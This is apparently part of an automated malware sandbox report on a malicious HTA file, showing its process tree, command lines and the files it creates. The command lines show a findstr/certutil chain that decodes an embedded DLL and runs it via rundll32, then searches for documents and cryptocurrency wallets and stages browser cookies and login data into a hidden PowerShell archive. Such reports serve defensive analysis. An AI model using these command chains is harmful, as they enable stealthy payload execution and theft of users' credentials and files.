PID 4064 wrote to memory of 4640 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 4640 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 4640 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 5108 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 5108 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 5108 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 2508 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 4640 wrote to memory of 2508 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 4640 wrote to memory of 2508 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2956 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2956 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2956 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe
PID 5108 wrote to memory of 2692 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 5108 wrote to memory of 2692 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 5108 wrote to memory of 2692 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 4640 wrote to memory of 4440 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 4640 wrote to memory of 4440 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 4640 wrote to memory of 4440 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\certutil.exe
PID 5108 wrote to memory of 1652 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 5108 wrote to memory of 1652 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 5108 wrote to memory of 1652 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\rundll32.exe
PID 1652 wrote to memory of 1384 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\system32\rundll32.exe
PID 1652 wrote to memory of 1384 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\system32\rundll32.exe
PID 4640 wrote to memory of 640 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4640 wrote to memory of 640 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\NOTEPAD.EXE
PID 4640 wrote to memory of 640 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1384 wrote to memory of 2888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 2888 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1384 wrote to memory of 3836 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 3836 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4940 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4940 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2960 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2960 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 4864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2028 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 2028 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 752 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1384 wrote to memory of 752 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\findstr.exe

findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\findstr.exe

findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log netserv32.dll

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log password.txt

C:\Windows\SysWOW64\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\system32\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

Network

Files

C:\Users\Admin\AppData\Local\1.log

C:\Users\Admin\AppData\Local\Temp\1.log

memory/1652-9-0x00000000003B0000-0x00000000003CF000-memory.dmp

C:\Users\Admin\AppData\Local\netserv32.dll

memory/1384-11-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\password.txt

memory/1384-18-0x0000000180000000-0x0000000180127000-memory.dmp

C:\Users\Admin\AppData\Local\net

memory/1384-22-0x0000000180000000-0x0000000180127000-memory.dmp

memory/1384-21-0x0000000180000000-0x0000000180127000-memory.dmp

C:\Users\Admin\AppData\Local\micro.log

memory/2888-40-0x0000014DE9410000-0x0000014DE9432000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgnp30tx.ord.ps1

memory/2888-50-0x0000014DEB940000-0x0000014DEB952000-memory.dmp

memory/2888-51-0x0000014DE9560000-0x0000014DE956A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Cookies

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Login Data

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Web Data

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_key

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Cookies

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Login Data

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Web Data

C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_key

C:\Users\Admin\AppData\Local\notepad.log

memory/1384-71-0x0000000180000000-0x0000000180032000-memory.dmp

C:\Users\Admin\AppData\Local\micro.log.zip

memory/1652-91-0x00000000003B0000-0x00000000003CF000-memory.dmp

memory/1384-93-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp

\??\c:\users\admin\appdata\local\netlist.log

memory/1384-118-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp

memory/1384-119-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp